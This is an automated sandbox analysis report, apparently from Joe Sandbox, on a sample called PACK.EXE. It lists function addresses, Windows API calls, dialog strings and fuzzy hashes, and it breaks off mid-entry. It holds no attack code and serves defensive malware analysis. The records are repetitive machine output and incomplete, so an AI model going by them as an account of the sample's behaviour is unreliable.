Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ItemText$DialogWindow
• String ID: RENAMEDLG
• API String ID: 445417207-3299779563
• Opcode ID: a11a03878e8738e8c7c6785c346df9d3647bcc6f7343e3f24f415e35578fce30
• Instruction ID: 552e94a4e1ebbb95c7465216bf5844a432ff46821dcbe9a29e9cceca26db65b6
• Opcode Fuzzy Hash: a11a03878e8738e8c7c6785c346df9d3647bcc6f7343e3f24f415e35578fce30
• Instruction Fuzzy Hash: FA012833A402587ED6325EEA5D45F377B6CEB5AB10F10401AF381B7084C6976C02B7B5
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00FFABAF
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FFABD2
  • Part of subcall function 00FF7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FF2FA6,?,0000015D,?,?,?,?,00FF4482,000000FF,00000000,?,?), ref: 00FF7ABC
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00FFABF8
• _free.LIBCMT ref: 00FFAC0B
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FFAC1A
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: e96985a43343b9cf2544f54135084a8104282f7fc4afdd8cec416197df134772
• Instruction ID: 02690800c67ef8eb9bb9554af1b5a4a8b8b091201765d26f369deff4383a66f7
• Opcode Fuzzy Hash: e96985a43343b9cf2544f54135084a8104282f7fc4afdd8cec416197df134772
• Instruction Fuzzy Hash: 2A0188B2A016197F233217B66C4CD7F796DDEC6B703154119FB08D3255EA65CD01A2B1
APIs
• GetLastError.KERNEL32(?,?,?,00FF7ED1,00FF7B6D,?,00FF8544,00000001,00000364,?,00FF2E0F,?,?,010100E0), ref: 00FF859F
• _free.LIBCMT ref: 00FF85D4
• _free.LIBCMT ref: 00FF85FB
• SetLastError.KERNEL32(00000000,?,010100E0), ref: 00FF8608
• SetLastError.KERNEL32(00000000,?,010100E0), ref: 00FF8611
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: ae1c0ca022ec7cc3b238ab4e3ad93f99f00a24de77060a409a2ecc205e00f276
• Instruction ID: 65696c5dc1e732b4a8bc13e0c61870f3de51c789fe5be2fa50492b78c2190409
• Opcode Fuzzy Hash: ae1c0ca022ec7cc3b238ab4e3ad93f99f00a24de77060a409a2ecc205e00f276
• Instruction Fuzzy Hash: 4E0126776087082BC71273746C89B3B35198FC1BB0B2A0024FB45E2277EE6E8D037224
APIs
  • Part of subcall function 00FE0697: ResetEvent.KERNEL32(?), ref: 00FE06A9
  • Part of subcall function 00FE0697: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00FE06BD
• ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00FE03FB
• CloseHandle.KERNEL32(?,?), ref: 00FE0415
• DeleteCriticalSection.KERNEL32(?), ref: 00FE042E
• CloseHandle.KERNEL32(?), ref: 00FE043A
• CloseHandle.KERNEL32(?), ref: 00FE0446
  • Part of subcall function 00FE04BA: WaitForSingleObject.KERNEL32(?,000000FF,00FE05D9,?,?,00FE064E,?,?,?,?,?,00FE0638), ref: 00FE04C0
  • Part of subcall function 00FE04BA: GetLastError.KERNEL32(?,?,00FE064E,?,?,?,?,?,00FE0638), ref: 00FE04CC
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
• String ID:
• API String ID: 1868215902-0
• Opcode ID: 22bd2a9e271b748bbf100f1433dd2cd403baf89314413f9ab1beb2f01f378f15
• Instruction ID: 3adb69d5cdafb46dd499922df29db9e39b7f036e1aa9d83328eb541170ba9bb2
• Opcode Fuzzy Hash: 22bd2a9e271b748bbf100f1433dd2cd403baf89314413f9ab1beb2f01f378f15
• Instruction Fuzzy Hash: 1B01B572400744EBC732DF65DD88FC6BBEAFB44710F004519F19A92195CBBA6994DB90
APIs
• _free.LIBCMT ref: 00FFB479
  • Part of subcall function 00FF7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?), ref: 00FF7A66
  • Part of subcall function 00FF7A50: GetLastError.KERNEL32(?,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?,?), ref: 00FF7A78
• _free.LIBCMT ref: 00FFB48B
• _free.LIBCMT ref: 00FFB49D
• _free.LIBCMT ref: 00FFB4AF
• _free.LIBCMT ref: 00FFB4C1
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• _free.LIBCMT ref: 00FF75F9
  • Part of subcall function 00FF7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?), ref: 00FF7A66
  • Part of subcall function 00FF7A50: GetLastError.KERNEL32(?,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?,?), ref: 00FF7A78
• _free.LIBCMT ref: 00FF760B
• _free.LIBCMT ref: 00FF761E
• _free.LIBCMT ref: 00FF762F
• _free.LIBCMT ref: 00FF7640
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
Strings
Similarity
• API ID:
• String ID: 6P+
• API String ID: 0-3080146196
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\PACK.EXE,00000104), ref: 00FF6CB3
• _free.LIBCMT ref: 00FF6D7E
• _free.LIBCMT ref: 00FF6D88
Strings
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\AppData\Local\Temp\PACK.EXE
• API String ID: 2506810119-3974614470
APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,00000000,00000000,?,?,00FFEAAF,00000000,00000000,00000000), ref: 00FFE803
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00FFEAAF,00000000,00000000,00000000,00000000,00000000,00FF3FBF,00000000,00FF3FBF,0100AA70), ref: 00FFE831
• GetLastError.KERNEL32(?,00FFEAAF,00000000,00000000,00000000,00000000,00000000,00FF3FBF,00000000,00FF3FBF,0100AA70,00000010,00FFD947,00000000,0100A9E8,00000010), ref: 00FFE862
Strings
Similarity
• API ID: ByteCharErrorFileLastMultiWideWrite
• String ID: 6P+
• API String ID: 2456169464-3080146196
APIs
• __EH_prolog.LIBCMT ref: 00FD73BE
  • Part of subcall function 00FD399D: __EH_prolog.LIBCMT ref: 00FD39A2
• GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00FD7485
  • Part of subcall function 00FD7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FD7A24
  • Part of subcall function 00FD7A15: GetLastError.KERNEL32 ref: 00FD7A6A
  • Part of subcall function 00FD7A15: CloseHandle.KERNEL32(?), ref: 00FD7A79
Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                                            • API String ID: 3813983858-639343689
                                                                                                                                                                            • Opcode ID: 0b8cbf28e651be5c398865d80c5ef16e67af015fde997db6b7c0449ab64c6c09
                                                                                                                                                                            • Instruction ID: c5e3a3d8777cd2ac60dce89236105281e72a8f3e810217c7ba71c98a63850ea9
                                                                                                                                                                            • Opcode Fuzzy Hash: 0b8cbf28e651be5c398865d80c5ef16e67af015fde997db6b7c0449ab64c6c09
                                                                                                                                                                            • Instruction Fuzzy Hash: B331C631E04344AADF22FBA4DC41BEE7B7AAB45310F084017F488EB242DB7D4E44A7A1
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FD12D7: GetDlgItem.USER32(00000000,00003021), ref: 00FD131B
                                                                                                                                                                              • Part of subcall function 00FD12D7: SetWindowTextW.USER32(00000000,010022E4), ref: 00FD1331
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00FE9C15
                                                                                                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00FE9C2A
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00FE9C3F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                                                                                            • String ID: ASKNEXTVOL
                                                                                                                                                                            • API String ID: 445417207-3402441367
                                                                                                                                                                            • Opcode ID: 4022ba3b9d51b6820245eec5397551d1ae5381f3a90bb336b305d8ce9e833f61
                                                                                                                                                                            • Instruction ID: d641fae7519899bb2b304b3fd5047831cc66e56dce83957cef2e25652212535c
                                                                                                                                                                            • Opcode Fuzzy Hash: 4022ba3b9d51b6820245eec5397551d1ae5381f3a90bb336b305d8ce9e833f61
                                                                                                                                                                            • Instruction Fuzzy Hash: 45112C337081467FD632BFAADD08F7A37B9EB46750F240055F2409B155C7EA9902A735
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __fprintf_l_strncpy
                                                                                                                                                                            • String ID: $%s$@%s
                                                                                                                                                                            • API String ID: 1857242416-834177443
                                                                                                                                                                            • Opcode ID: 0469aab0f666183f9decffecb1f99abb6ecf6095e940e3d36cdcf325f25a6eac
                                                                                                                                                                            • Instruction ID: f2e2c53e17c5f0f6865c74926d33672454946c9d422480f91e6b553192455d83
                                                                                                                                                                            • Opcode Fuzzy Hash: 0469aab0f666183f9decffecb1f99abb6ecf6095e940e3d36cdcf325f25a6eac
                                                                                                                                                                            • Instruction Fuzzy Hash: 63216FB284030DAEEB21DFA4CC05FEE3BA9AF04710F080527FA54972A1D735D655EBA1
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FD12D7: GetDlgItem.USER32(00000000,00003021), ref: 00FD131B
                                                                                                                                                                              • Part of subcall function 00FD12D7: SetWindowTextW.USER32(00000000,010022E4), ref: 00FD1331
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00FEA0FE
                                                                                                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00FEA116
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 00FEA144
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                                                                                            • String ID: GETPASSWORD1
                                                                                                                                                                            • API String ID: 445417207-3292211884
                                                                                                                                                                            • Opcode ID: 1da16f3611119c8d29dc46c3eccaa1f00c7076a0fd10d3a13b9bb1ed4e29fc69
                                                                                                                                                                            • Instruction ID: 11ed74bd88d314a96376aafeffdd661889e250a0a8e9255ea16fcf4b229ff920
                                                                                                                                                                            • Opcode Fuzzy Hash: 1da16f3611119c8d29dc46c3eccaa1f00c7076a0fd10d3a13b9bb1ed4e29fc69
                                                                                                                                                                            • Instruction Fuzzy Hash: 88110C3290415C76DB229E7A9C49FFB377CEB09710F000015FA85F7180C669A951AB72
                                                                                                                                                                            APIs
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FDB1DE
                                                                                                                                                                              • Part of subcall function 00FD3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD3E54
                                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00FDB1FC
                                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00FDB20C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                                                                            • String ID: %c:\
                                                                                                                                                                            • API String ID: 525462905-3142399695
                                                                                                                                                                            • Opcode ID: c874dbaa86ff7e85ae2b8cee601b24a1445f2b8d507e21499cbe03ac6e7e4488
                                                                                                                                                                            • Instruction ID: 216a06142800ad8b9967739c28051fc895caddd20b00a76ee051b7a8ab2a5990
                                                                                                                                                                            • Opcode Fuzzy Hash: c874dbaa86ff7e85ae2b8cee601b24a1445f2b8d507e21499cbe03ac6e7e4488
                                                                                                                                                                            • Instruction Fuzzy Hash: EC012653800311A59A217F259C86D3FB7ADEE95771B89440BF944C2292FB34D840E3B1
                                                                                                                                                                            APIs
                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00FDA865,00000008,00000000,?,?,00FDC802,?,00000000,?,00000001,?), ref: 00FE035F
                                                                                                                                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00FDA865,00000008,00000000,?,?,00FDC802,?,00000000), ref: 00FE0369
                                                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00FDA865,00000008,00000000,?,?,00FDC802,?,00000000), ref: 00FE0379
                                                                                                                                                                            Strings
                                                                                                                                                                            • Thread pool initialization failed., xrefs: 00FE0391
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                            • String ID: Thread pool initialization failed.
                                                                                                                                                                            • API String ID: 3340455307-2182114853
                                                                                                                                                                            • Opcode ID: 3f4a1ff10fc006121535d5b3dea87219b58e077fc9fae8027a9f8684e2b897aa
                                                                                                                                                                            • Instruction ID: 7664b951004fecd9fb1633fa65c27a60df74e91bb44ef8f0981f6b965228d02b
• Opcode Fuzzy Hash: 3f4a1ff10fc006121535d5b3dea87219b58e077fc9fae8027a9f8684e2b897aa
• Instruction Fuzzy Hash: 9D1182B15007089FD3325F66DCC8AABFBECEB55355F10482EF1DA86201DAB529C0DB60
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID:
• String ID: RENAMEDLG$REPLACEFILEDLG
• API String ID: 0-56093855
• Opcode ID: 25af27ddb900b3a545b9288407ad81b1b4f0816da3498bdbc7a672e03b77d80c
• Instruction ID: 9bc69de48f81ea4d080966dced2347153b26e2b34225d1851138ae181a621191
• Opcode Fuzzy Hash: 25af27ddb900b3a545b9288407ad81b1b4f0816da3498bdbc7a672e03b77d80c
• Instruction Fuzzy Hash: 5501D8725042C5AFD7229E56ED00E2BBFE9F7447A0F000426F5C5E2215D7BB9C21ABE1
APIs
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
• Instruction ID: eb32d8f029c1b8302d2eae4ba851f59ecbc087d22d68cbc4ee319215c0e1b559
• Opcode Fuzzy Hash: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
• Instruction Fuzzy Hash: 1DA16C32D0478A9FDB21CF18C8817BEBBE1EF153E0F14416ED6859B2A1CA788D42D751
APIs
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00FD7F2C,?,?,?), ref: 00FDA03C
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00FD7F2C,?,?), ref: 00FDA080
• SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00FD7F2C,?,?,?,?,?,?,?,?), ref: 00FDA101
• CloseHandle.KERNEL32(?,?,00000000,?,00FD7F2C,?,?,?,?,?,?,?,?,?,?,?), ref: 00FDA108
Similarity
• API ID: File$Create$CloseHandleTime
• String ID:
• API String ID: 2287278272-0
• Opcode ID: c55217b62127d022fa0167d0c32d30708f7b818919b563ea53dad729572c0422
• Instruction ID: 6e2a0e4bc5436b7bac7a0b07c3a3e7b94a007e8f5b14fb2ea3fd27fed8b2f8d5
• Opcode Fuzzy Hash: c55217b62127d022fa0167d0c32d30708f7b818919b563ea53dad729572c0422
• Instruction Fuzzy Hash: B441C3316483819AD731DF64DC45BAEBBEA9B85310F08091EB5D1D32C1D6A8DA4CEB53
APIs
• LoadBitmapW.USER32(00000065), ref: 00FEA508
• GetObjectW.GDI32(00000000,00000018,?), ref: 00FEA529
• DeleteObject.GDI32(00000000), ref: 00FEA551
• DeleteObject.GDI32(00000000), ref: 00FEA570
  • Part of subcall function 00FE963A: FindResourceW.KERNEL32(00000066,PNG,?,?,00FEA54A,00000066), ref: 00FE964B
  • Part of subcall function 00FE963A: SizeofResource.KERNEL32(00000000,75295780,?,?,00FEA54A,00000066), ref: 00FE9663
  • Part of subcall function 00FE963A: LoadResource.KERNEL32(00000000,?,?,00FEA54A,00000066), ref: 00FE9676
  • Part of subcall function 00FE963A: LockResource.KERNEL32(00000000,?,?,00FEA54A,00000066), ref: 00FE9681
Similarity
• API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
• String ID:
• API String ID: 142272564-0
• Opcode ID: 0e79810199b57e2d0be1c6304e8410f4653700d6cc0d8dd02ccc959dcf71a067
• Instruction ID: fadb1bb126381eb52447a9bb770bfb7e047c3bdb69e5f1f0075b00c24c833bce
• Opcode Fuzzy Hash: 0e79810199b57e2d0be1c6304e8410f4653700d6cc0d8dd02ccc959dcf71a067
• Instruction Fuzzy Hash: 3E01263294038537C72273AA9C46E7F77AEDFC5B61F0C0025FA40A7285DE9A9C0263B1
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 00FF1AA0
  • Part of subcall function 00FF20D8: ___AdjustPointer.LIBCMT ref: 00FF2122
• _UnwindNestedFrames.LIBCMT ref: 00FF1AB7
• ___FrameUnwindToState.LIBVCRUNTIME ref: 00FF1AC9
• CallCatchBlock.LIBVCRUNTIME ref: 00FF1AED
Similarity
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• String ID:
• API String ID: 2633735394-0
• Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
• Instruction ID: 1bc1b7ab47ca9ba6109279983f30017e7f5f2a2787635c7ba482d2f48156cb17
• Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
• Instruction Fuzzy Hash: B001053240014CEBCF129F95CC01EEA3BAAFF58754F044115FE1865130D73AE8A1EBA0
APIs
• ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00FF15E6
• ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00FF15EB
• ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00FF15F0
  • Part of subcall function 00FF268E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00FF269F
• ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00FF1605
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1761009282-0
                                                                                                                                                                            • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                                                                                                            • Instruction ID: 425df10adf1626201734122db89ae73073675b0dd07a12218f146994348ff1b2
                                                                                                                                                                            • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                                                                                                            • Instruction Fuzzy Hash: ECC04C6944064DD01CA03AB53B637FD33002DA27D5B8D14C1BF41571379E8D080BB837
APIs
  • Part of subcall function 00FE960F: GetDC.USER32(00000000), ref: 00FE9613
  • Part of subcall function 00FE960F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FE961E
  • Part of subcall function 00FE960F: ReleaseDC.USER32(00000000,00000000), ref: 00FE9629
• GetObjectW.GDI32(?,00000018,?), ref: 00FE978E
  • Part of subcall function 00FE9954: GetDC.USER32(00000000), ref: 00FE995D
  • Part of subcall function 00FE9954: GetObjectW.GDI32(?,00000018,?), ref: 00FE998C
  • Part of subcall function 00FE9954: ReleaseDC.USER32(00000000,?), ref: 00FE9A20
Strings
Memory Dump Source
